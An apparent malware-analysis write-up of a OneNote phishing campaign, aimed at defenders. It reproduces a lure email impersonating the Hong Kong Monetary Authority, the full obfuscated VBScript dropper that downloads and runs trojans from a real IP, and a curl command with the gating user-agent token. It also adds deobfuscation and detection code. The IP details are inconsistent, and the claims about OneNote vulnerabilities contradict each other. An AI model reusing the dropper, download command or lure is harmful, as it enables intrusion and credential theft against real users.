We take one of the cases we encountered as an example and expand the analysis:
1. Phishing email text with a .one file attachment
From: Bank Complaints <[email protected]>
Sent: Thursday, March 2, 2023 11:00 AM
To: Miles Mok XXXX
Subject: [External Mail] xxxx Industry Development Survey
Dear XXXX Ltd employees,
The Hong Kong Monetary Authority would like to conduct an annual banking industry development survey to assess the performance and employment situation in the financial industry. This is COMPULSORY for all employees to submit the survey to fulfill the requirement of CG-6 (Supervisory Policy Manual). Your feedback is extremely important to us; it would be highly appreciated if you could submit the survey by 10th March (Fri).
To xxxx staff:
The Hong Kong Monetary Authority also conducts a banking industry development survey every year to understand the performance and employment situation of the financial industry. All bank staff are required to submit questionnaires as required by CG-6 (Supervisory Policy Manual). Your feedback is very important to us and we would appreciate it if you could submit the questionnaire by Friday, March 10th.
Yours sincerely,
Financial Infrastructure Development Department
Hong Kong Monetary Authority
55th Floor | 2 IFC, 8 Finance Street | Central, Hong Kong
2. Analysis of the phishing attack infrastructure
E-mail: [email protected]
Content of the VBS script embedded in the .one attachment:
```vbscript
<job id="AlterClassic">
<script language="VBScript">
' The command line is split into short fragments and reassembled with "&",
' so no single literal looks like a URL, a path or a curl invocation.
' Several variables (r, what, d, q, u, car) are never used and only pad the script.
Dim r
Dim what
Dim apq
Dim ape
apq = "gM6VYXKWe"
r= "p"
Dim az
az = "5.107/1Moc"
r = r & "owE"
r = r & "r"
Dim en
en = "ll htt"
Dim et
et = " -o %temp"
ape = "vfy9XpqF"
r = r & "sH"
r = r & "el"
Dim d
d = "-"
Dim q
q = "w"
q = "i" & q
Dim u
u = ":"
apa = "5hwqtJeqJ"
apv = "tgogNk"
Dim ap
ap = apa & apq & ape & apv
Dim ad
ad = "cUr"
Dim aw
aw = "L -k -A "
Dim fi
fi = "%\di"
Dim gk
gk = "smco"
Dim ev
ev = "re.d"
Dim qw
qw = "231.6"
Dim dll
dll = "Dis"
Dim nm
nm = "a7/160223"
Dim de
de = "ll"
Dim sx
sx = "%\Dis"
Dim sc
sc = "m.e"
Dim sv
sv = "xe htt"
Dim sw
sw = " %tem"
Dim sp
sp = "p%\Di"
Dim zz
zz = "ps://20."
Dim bbc
bbc = gk & ev & en & zz & qw & az & nm & " && "
Dim sb
sb = "sm.e"
Dim sn
sn = "xe"
Dim dl
dl = "dEl"
Dim car
car = "car"
Dim ed
ed = "di"
Dim sq
sq = "a7/160224 &&"
' Stage 1: the "ap" token is the user-agent that gates both downloads (dll, then exe); the exe is then run.
Dim xp
xp = ad&aw&ap&et&fi&bbc&ad&aw&ap&et&sx&sc&sv&zz&qw&az&sq&sw&sp&sb&sn
CreateObject("WScript.Shell").Run "cmd.exe /c" & xp ,0, True
' Stage 2: after roughly 100 seconds, delete the dropped files. "xe" is never assigned,
' so it evaluates to Empty and the first dEl targets "%temp%\Dism.e" rather than the exe.
Dim nd
nd = dl&sw&"p%\"&dll&sc&xe&"&&"&dl&sw&"p%\"&ed&gk&ev&de
wscript.sleep 100000
CreateObject("WScript.Shell").Run "cmd.exe /c" & nd ,0, True
</script>
</job>
```
Auditing the code and splicing the fragments back together shows that the VBS script is used to download a remote Trojan. The Trojan's address is:
20.231.65.107/1Moca7/160223
Note: the Trojan cannot be downloaded directly; the server checks the User-Agent, so the download only succeeds when curl's -A parameter is set to the user-agent token from the script.
curl -A 5hwqtJeqJgM6VYXKWevfy9XpqFtgogNk -o dsmcore.dll https://20.231.65.181/1Moca7/160223
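As an added example (not code from the original analysis), the following Python statically evaluates this kind of fragment-and-concatenate dropper: it replays every assignment, resolves the expression handed to WScript.Shell.Run, and pulls the URL, user-agent token and drop path out of the result. The embedded script is a constructed sample in the same style; its host, path and user-agent are placeholders, not the indicators above.

```python
import re

# Constructed sample in the style of the dropper above: the curl command line is cut into
# fragments and reassembled with "&". Host, path and user-agent token are placeholders.
SAMPLE_VBS = r'''
<script language="VBScript">
Dim ad
ad = "cUr"
aw = "L -k -A "
ap = "UA-PLACEHOLDER"
zz = "ps://198."
qw = "51.100.7/stage/1"
et = " -o %temp"
fi = "%\payload.dll htt"
xp = ad & aw & ap & et & fi & zz & qw & " && " & missing & "exit"
CreateObject("WScript.Shell").Run "cmd.exe /c " & xp ,0, True
</script>
'''

TOKEN = re.compile(r'"([^"]*)"|([A-Za-z_]\w*)')          # string literal or variable name
ASSIGN = re.compile(r'^([A-Za-z_]\w*)\s*=\s*(.+)$')       # name = expression
RUN = re.compile(r'\.Run\s+(.+?)\s*,\s*\d+\s*,\s*(?:True|False)\s*$', re.I)

def eval_concat(expr, env):
    # Literals and names joined by "&". Names are case-insensitive and an unassigned
    # name is Empty (""), which is why the dropper's unassigned "xe" silently vanishes.
    return "".join(lit if not name else env.get(name.lower(), "")
                   for lit, name in TOKEN.findall(expr))

def deobfuscate(vbs_text):
    """Replay every assignment in order (no code is executed) and return the
    reassembled command strings handed to WScript.Shell.Run."""
    env, commands = {}, []
    for line in (l.strip() for l in vbs_text.splitlines()):
        run = RUN.search(line)
        if run:
            commands.append(eval_concat(run.group(1), env))
            continue
        assign = ASSIGN.match(line)
        if assign:
            env[assign.group(1).lower()] = eval_concat(assign.group(2), env)
    return commands

def extract_iocs(command):
    """URL, gating user-agent (-A) and drop path (-o) from a reassembled curl command."""
    url = re.search(r"https?://\S+", command)
    ua = re.search(r"-A\s+(\S+)", command)
    out = re.search(r"-o\s+(\S+)", command)
    return {"url": url and url.group(0), "user_agent": ua and ua.group(1),
            "drop_path": out and out.group(1)}
```

Running `deobfuscate` over the real script recovers the two curl lines and the delete command without ever executing the sample.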
We ran an association query on the IP in the Weibu online threat-intelligence platform.
The IP turned out to be a machine in Virginia Beach, Virginia, USA, and it had already been marked as a phishing IP: it had been used to deliver phishing Trojans as early as 2022.3.22.
We also ran a correlation study on the IP's C segment (the /24 range) and found more than 20 machines in it, all used for phishing. It must be phishing infrastructure deployed by a company's attack and defense team.
We extracted all the phishing IPs in that range.
3. Research on the phishing attack method
Through research, we identified the actual attack method and the principle behind it used by this phishing group.
Reference (discovered on 2023.1.27):
https://twitter.com/AttackTrends/status/1623670800266952705?s=20
Hackers used OneNote attachments in phishing emails to install malware and steal access passwords.
Malicious actors take advantage of Microsoft's frequent feature updates to OneNote: when the recipient double-clicks the attachment of a spam email, a script runs automatically and installs malware from a remote site onto the user's computer.
OneNote is one of the most popular components of the Microsoft 365 package, and the company is currently updating it. However, the product's frequent beta testing has resulted in vulnerabilities that hackers can exploit for phishing-based malware attacks, and security professionals have now issued warnings that malicious actors are using OneNote attachments to covertly install malware on user devices.
The warning was originally sent via a tweet from Perception Point Attack Trends, which reported the vulnerability. The malware can not only be used to steal passwords, but also to attack cryptocurrency wallets and even install other add-ons on unsuspecting users' devices.
Attack principle:
Hackers have found ways to bypass macro blocking to deliver malware. They craft phishing emails around themes such as fake invoices, payments, or notifications.
In most cases, the image in the email is blurred and carries the text "Double-click to view the file".
Double-clicking actually runs a malicious Visual Basic script file, which starts communicating with a remote server to install malware, including various Trojan horse programs.
To fully protect themselves, OneNote users must heed the application's warnings and use multi-factor authentication, antivirus, and firewalls wherever possible, and should not download attachments from unfamiliar email links.
Screenshots of this phishing attack process:
1) The attacker sends emails in batches
2) The victim downloads the .one attachment and opens it normally (screenshot of the actual effect)
NOTE: to mislead the user, this image carries malicious code that first downloads a benign .one file from a legitimate website and opens it in the normal OneNote application; the code that follows downloads the bat file from another attacker-controlled website and executes it to perform the malicious operations. Opening OneNote first serves only as a decoy, not because the .one file format has a vulnerability.
3) The victim double-clicks "Double click to view document" (which covers the hidden script) and thereby executes the vbs script
The script content is as follows:
4) Running the vbs script automatically pulls the remote-control Trojan the attacker has deployed
curl is used to pull the dll and exe Trojans from the attack server 20.231.65.107 and execute them
5) The attacker's C2 server obtains control of the victim's PC for further intranet penetration (information collection)
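As an added example (not from the original analysis), a small detection that scores process-creation records against the chain described in steps 3) and 4): a script host launched from OneNote, cmd.exe/curl launched from that script host, a long opaque -A token, a binary written to %temp%, and a download from a bare IP. The records, paths, host and token below are constructed placeholders, not telemetry from this case.

```python
import re

# Constructed process-creation records (parent image, image, command line) shaped like the
# OneNote -> wscript.exe -> cmd.exe/curl chain above. Paths, host and token are placeholders.
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\AppData\Local\Temp\onenote_export\Open.vbs"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /ccUrL -k -A Ab3kLmN9QwErTyUiOp12ZxCvBnM45678 -o %temp%\dsmcore.dll "
                r"https://198.51.100.7/a/1 && %temp%\dsm.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl -o report.csv https://intranet.example.test/export"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

def _exe(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the indicators one record matches; each alone is weak, together they are the chain."""
    parent, image, cmd = _exe(ev["parent"]), _exe(ev["image"]), ev["cmdline"]
    hits = []
    if image in SCRIPT_HOSTS and parent == "onenote.exe":
        hits.append("script host launched from OneNote")
    # No leading word boundary: the dropper writes "cmd.exe /ccUrL" with no space after /c.
    if parent in SCRIPT_HOSTS and re.search(r"curl(\.exe)?\s", cmd, re.I):
        hits.append("curl launched via script host")
    if re.search(r"-A\s+[A-Za-z0-9]{16,}(\s|$)", cmd):
        hits.append("opaque user-agent token (download gating)")
    if re.search(r"-o\s+%temp%\\\S+\.(dll|exe)\b", cmd, re.I):
        hits.append("binary dropped into %temp%")
    if re.search(r"https?://\d{1,3}(\.\d{1,3}){3}/", cmd):
        hits.append("download from bare IP")
    return hits

def flag_events(events, threshold=2):
    """Indices of records matching at least `threshold` indicators."""
    return [i for i, ev in enumerate(events) if len(score_event(ev)) >= threshold]
```

The benign third record (curl from explorer.exe, no token, named host) scores zero, while the dropper's cmd.exe record trips four indicators at once.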